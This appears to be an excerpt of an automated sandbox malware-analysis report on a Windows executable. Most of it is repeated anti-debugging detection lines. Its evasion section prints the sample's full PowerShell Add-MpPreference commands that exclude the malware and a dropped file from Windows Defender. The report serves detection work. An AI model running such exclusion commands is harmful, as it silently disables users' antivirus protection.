Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018306F1 mov eax, dword ptr fs:[00000030h]	8_2_018306F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018306F1 mov eax, dword ptr fs:[00000030h]	8_2_018306F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C260B mov eax, dword ptr fs:[00000030h]	8_2_017C260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C260B mov eax, dword ptr fs:[00000030h]	8_2_017C260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C260B mov eax, dword ptr fs:[00000030h]	8_2_017C260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C260B mov eax, dword ptr fs:[00000030h]	8_2_017C260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C260B mov eax, dword ptr fs:[00000030h]	8_2_017C260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C260B mov eax, dword ptr fs:[00000030h]	8_2_017C260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C260B mov eax, dword ptr fs:[00000030h]	8_2_017C260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182E609 mov eax, dword ptr fs:[00000030h]	8_2_0182E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EA6C7 mov ebx, dword ptr fs:[00000030h]	8_2_017EA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EA6C7 mov eax, dword ptr fs:[00000030h]	8_2_017EA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E66B0 mov eax, dword ptr fs:[00000030h]	8_2_017E66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EC6A6 mov eax, dword ptr fs:[00000030h]	8_2_017EC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187866E mov eax, dword ptr fs:[00000030h]	8_2_0187866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187866E mov eax, dword ptr fs:[00000030h]	8_2_0187866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B4690 mov eax, dword ptr fs:[00000030h]	8_2_017B4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B4690 mov eax, dword ptr fs:[00000030h]	8_2_017B4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F096E mov eax, dword ptr fs:[00000030h]	8_2_017F096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F096E mov edx, dword ptr fs:[00000030h]	8_2_017F096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F096E mov eax, dword ptr fs:[00000030h]	8_2_017F096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D6962 mov eax, dword ptr fs:[00000030h]	8_2_017D6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D6962 mov eax, dword ptr fs:[00000030h]	8_2_017D6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D6962 mov eax, dword ptr fs:[00000030h]	8_2_017D6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018389B3 mov esi, dword ptr fs:[00000030h]	8_2_018389B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018389B3 mov eax, dword ptr fs:[00000030h]	8_2_018389B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018389B3 mov eax, dword ptr fs:[00000030h]	8_2_018389B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018469C0 mov eax, dword ptr fs:[00000030h]	8_2_018469C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187A9D3 mov eax, dword ptr fs:[00000030h]	8_2_0187A9D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017A8918 mov eax, dword ptr fs:[00000030h]	8_2_017A8918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017A8918 mov eax, dword ptr fs:[00000030h]	8_2_017A8918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183E9E0 mov eax, dword ptr fs:[00000030h]	8_2_0183E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E29F9 mov eax, dword ptr fs:[00000030h]	8_2_017E29F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E29F9 mov eax, dword ptr fs:[00000030h]	8_2_017E29F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182E908 mov eax, dword ptr fs:[00000030h]	8_2_0182E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182E908 mov eax, dword ptr fs:[00000030h]	8_2_0182E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183C912 mov eax, dword ptr fs:[00000030h]	8_2_0183C912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183892A mov eax, dword ptr fs:[00000030h]	8_2_0183892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA9D0 mov eax, dword ptr fs:[00000030h]	8_2_017BA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA9D0 mov eax, dword ptr fs:[00000030h]	8_2_017BA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA9D0 mov eax, dword ptr fs:[00000030h]	8_2_017BA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA9D0 mov eax, dword ptr fs:[00000030h]	8_2_017BA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA9D0 mov eax, dword ptr fs:[00000030h]	8_2_017BA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA9D0 mov eax, dword ptr fs:[00000030h]	8_2_017BA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E49D0 mov eax, dword ptr fs:[00000030h]	8_2_017E49D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0184892B mov eax, dword ptr fs:[00000030h]	8_2_0184892B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01830946 mov eax, dword ptr fs:[00000030h]	8_2_01830946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01884940 mov eax, dword ptr fs:[00000030h]	8_2_01884940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B09AD mov eax, dword ptr fs:[00000030h]	8_2_017B09AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B09AD mov eax, dword ptr fs:[00000030h]	8_2_017B09AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0 mov eax, dword ptr fs:[00000030h]	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0 mov eax, dword ptr fs:[00000030h]	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0 mov eax, dword ptr fs:[00000030h]	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0 mov eax, dword ptr fs:[00000030h]	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0 mov eax, dword ptr fs:[00000030h]	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0 mov eax, dword ptr fs:[00000030h]	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0 mov eax, dword ptr fs:[00000030h]	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0 mov eax, dword ptr fs:[00000030h]	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0 mov eax, dword ptr fs:[00000030h]	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0 mov eax, dword ptr fs:[00000030h]	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0 mov eax, dword ptr fs:[00000030h]	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0 mov eax, dword ptr fs:[00000030h]	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0 mov eax, dword ptr fs:[00000030h]	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01854978 mov eax, dword ptr fs:[00000030h]	8_2_01854978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01854978 mov eax, dword ptr fs:[00000030h]	8_2_01854978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183C97C mov eax, dword ptr fs:[00000030h]	8_2_0183C97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183C89D mov eax, dword ptr fs:[00000030h]	8_2_0183C89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B4859 mov eax, dword ptr fs:[00000030h]	8_2_017B4859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B4859 mov eax, dword ptr fs:[00000030h]	8_2_017B4859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E0854 mov eax, dword ptr fs:[00000030h]	8_2_017E0854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C2840 mov ecx, dword ptr fs:[00000030h]	8_2_017C2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D2835 mov eax, dword ptr fs:[00000030h]	8_2_017D2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D2835 mov eax, dword ptr fs:[00000030h]	8_2_017D2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D2835 mov eax, dword ptr fs:[00000030h]	8_2_017D2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D2835 mov ecx, dword ptr fs:[00000030h]	8_2_017D2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D2835 mov eax, dword ptr fs:[00000030h]	8_2_017D2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D2835 mov eax, dword ptr fs:[00000030h]	8_2_017D2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018808C0 mov eax, dword ptr fs:[00000030h]	8_2_018808C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EA830 mov eax, dword ptr fs:[00000030h]	8_2_017EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187A8E4 mov eax, dword ptr fs:[00000030h]	8_2_0187A8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EC8F9 mov eax, dword ptr fs:[00000030h]	8_2_017EC8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EC8F9 mov eax, dword ptr fs:[00000030h]	8_2_017EC8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183C810 mov eax, dword ptr fs:[00000030h]	8_2_0183C810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE8C0 mov eax, dword ptr fs:[00000030h]	8_2_017DE8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185483A mov eax, dword ptr fs:[00000030h]	8_2_0185483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185483A mov eax, dword ptr fs:[00000030h]	8_2_0185483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183E872 mov eax, dword ptr fs:[00000030h]	8_2_0183E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183E872 mov eax, dword ptr fs:[00000030h]	8_2_0183E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01846870 mov eax, dword ptr fs:[00000030h]	8_2_01846870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01846870 mov eax, dword ptr fs:[00000030h]	8_2_01846870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B0887 mov eax, dword ptr fs:[00000030h]	8_2_017B0887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017ACB7E mov eax, dword ptr fs:[00000030h]	8_2_017ACB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017A8B50 mov eax, dword ptr fs:[00000030h]	8_2_017A8B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01864BB0 mov eax, dword ptr fs:[00000030h]	8_2_01864BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01864BB0 mov eax, dword ptr fs:[00000030h]	8_2_01864BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185EBD0 mov eax, dword ptr fs:[00000030h]	8_2_0185EBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DEB20 mov eax, dword ptr fs:[00000030h]	8_2_017DEB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DEB20 mov eax, dword ptr fs:[00000030h]	8_2_017DEB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183CBF0 mov eax, dword ptr fs:[00000030h]	8_2_0183CBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DEBFC mov eax, dword ptr fs:[00000030h]	8_2_017DEBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01884B00 mov eax, dword ptr fs:[00000030h]	8_2_01884B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B8BF0 mov eax, dword ptr fs:[00000030h]	8_2_017B8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B8BF0 mov eax, dword ptr fs:[00000030h]	8_2_017B8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B8BF0 mov eax, dword ptr fs:[00000030h]	8_2_017B8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182EB1D mov eax, dword ptr fs:[00000030h]	8_2_0182EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182EB1D mov eax, dword ptr fs:[00000030h]	8_2_0182EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182EB1D mov eax, dword ptr fs:[00000030h]	8_2_0182EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182EB1D mov eax, dword ptr fs:[00000030h]	8_2_0182EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182EB1D mov eax, dword ptr fs:[00000030h]	8_2_0182EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182EB1D mov eax, dword ptr fs:[00000030h]	8_2_0182EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182EB1D mov eax, dword ptr fs:[00000030h]	8_2_0182EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182EB1D mov eax, dword ptr fs:[00000030h]	8_2_0182EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182EB1D mov eax, dword ptr fs:[00000030h]	8_2_0182EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01878B28 mov eax, dword ptr fs:[00000030h]	8_2_01878B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01878B28 mov eax, dword ptr fs:[00000030h]	8_2_01878B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D0BCB mov eax, dword ptr fs:[00000030h]	8_2_017D0BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D0BCB mov eax, dword ptr fs:[00000030h]	8_2_017D0BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D0BCB mov eax, dword ptr fs:[00000030h]	8_2_017D0BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B0BCD mov eax, dword ptr fs:[00000030h]	8_2_017B0BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B0BCD mov eax, dword ptr fs:[00000030h]	8_2_017B0BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B0BCD mov eax, dword ptr fs:[00000030h]	8_2_017B0BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0BBE mov eax, dword ptr fs:[00000030h]	8_2_017C0BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0BBE mov eax, dword ptr fs:[00000030h]	8_2_017C0BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01846B40 mov eax, dword ptr fs:[00000030h]	8_2_01846B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01846B40 mov eax, dword ptr fs:[00000030h]	8_2_01846B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187AB40 mov eax, dword ptr fs:[00000030h]	8_2_0187AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01858B42 mov eax, dword ptr fs:[00000030h]	8_2_01858B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01864B4B mov eax, dword ptr fs:[00000030h]	8_2_01864B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01864B4B mov eax, dword ptr fs:[00000030h]	8_2_01864B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185EB50 mov eax, dword ptr fs:[00000030h]	8_2_0185EB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01882B57 mov eax, dword ptr fs:[00000030h]	8_2_01882B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01882B57 mov eax, dword ptr fs:[00000030h]	8_2_01882B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01882B57 mov eax, dword ptr fs:[00000030h]	8_2_01882B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01882B57 mov eax, dword ptr fs:[00000030h]	8_2_01882B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01884A80 mov eax, dword ptr fs:[00000030h]	8_2_01884A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017ECA6F mov eax, dword ptr fs:[00000030h]	8_2_017ECA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017ECA6F mov eax, dword ptr fs:[00000030h]	8_2_017ECA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017ECA6F mov eax, dword ptr fs:[00000030h]	8_2_017ECA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01806AA4 mov eax, dword ptr fs:[00000030h]	8_2_01806AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0A5B mov eax, dword ptr fs:[00000030h]	8_2_017C0A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0A5B mov eax, dword ptr fs:[00000030h]	8_2_017C0A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B6A50 mov eax, dword ptr fs:[00000030h]	8_2_017B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B6A50 mov eax, dword ptr fs:[00000030h]	8_2_017B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B6A50 mov eax, dword ptr fs:[00000030h]	8_2_017B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B6A50 mov eax, dword ptr fs:[00000030h]	8_2_017B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B6A50 mov eax, dword ptr fs:[00000030h]	8_2_017B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B6A50 mov eax, dword ptr fs:[00000030h]	8_2_017B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B6A50 mov eax, dword ptr fs:[00000030h]	8_2_017B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D4A35 mov eax, dword ptr fs:[00000030h]	8_2_017D4A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D4A35 mov eax, dword ptr fs:[00000030h]	8_2_017D4A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01806ACC mov eax, dword ptr fs:[00000030h]	8_2_01806ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01806ACC mov eax, dword ptr fs:[00000030h]	8_2_01806ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01806ACC mov eax, dword ptr fs:[00000030h]	8_2_01806ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DEA2E mov eax, dword ptr fs:[00000030h]	8_2_017DEA2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017ECA24 mov eax, dword ptr fs:[00000030h]	8_2_017ECA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EAAEE mov eax, dword ptr fs:[00000030h]	8_2_017EAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EAAEE mov eax, dword ptr fs:[00000030h]	8_2_017EAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183CA11 mov eax, dword ptr fs:[00000030h]	8_2_0183CA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B0AD0 mov eax, dword ptr fs:[00000030h]	8_2_017B0AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E4AD0 mov eax, dword ptr fs:[00000030h]	8_2_017E4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E4AD0 mov eax, dword ptr fs:[00000030h]	8_2_017E4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B8AA0 mov eax, dword ptr fs:[00000030h]	8_2_017B8AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B8AA0 mov eax, dword ptr fs:[00000030h]	8_2_017B8AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185EA60 mov eax, dword ptr fs:[00000030h]	8_2_0185EA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E8A90 mov edx, dword ptr fs:[00000030h]	8_2_017E8A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182CA72 mov eax, dword ptr fs:[00000030h]	8_2_0182CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182CA72 mov eax, dword ptr fs:[00000030h]	8_2_0182CA72

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe"
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe"
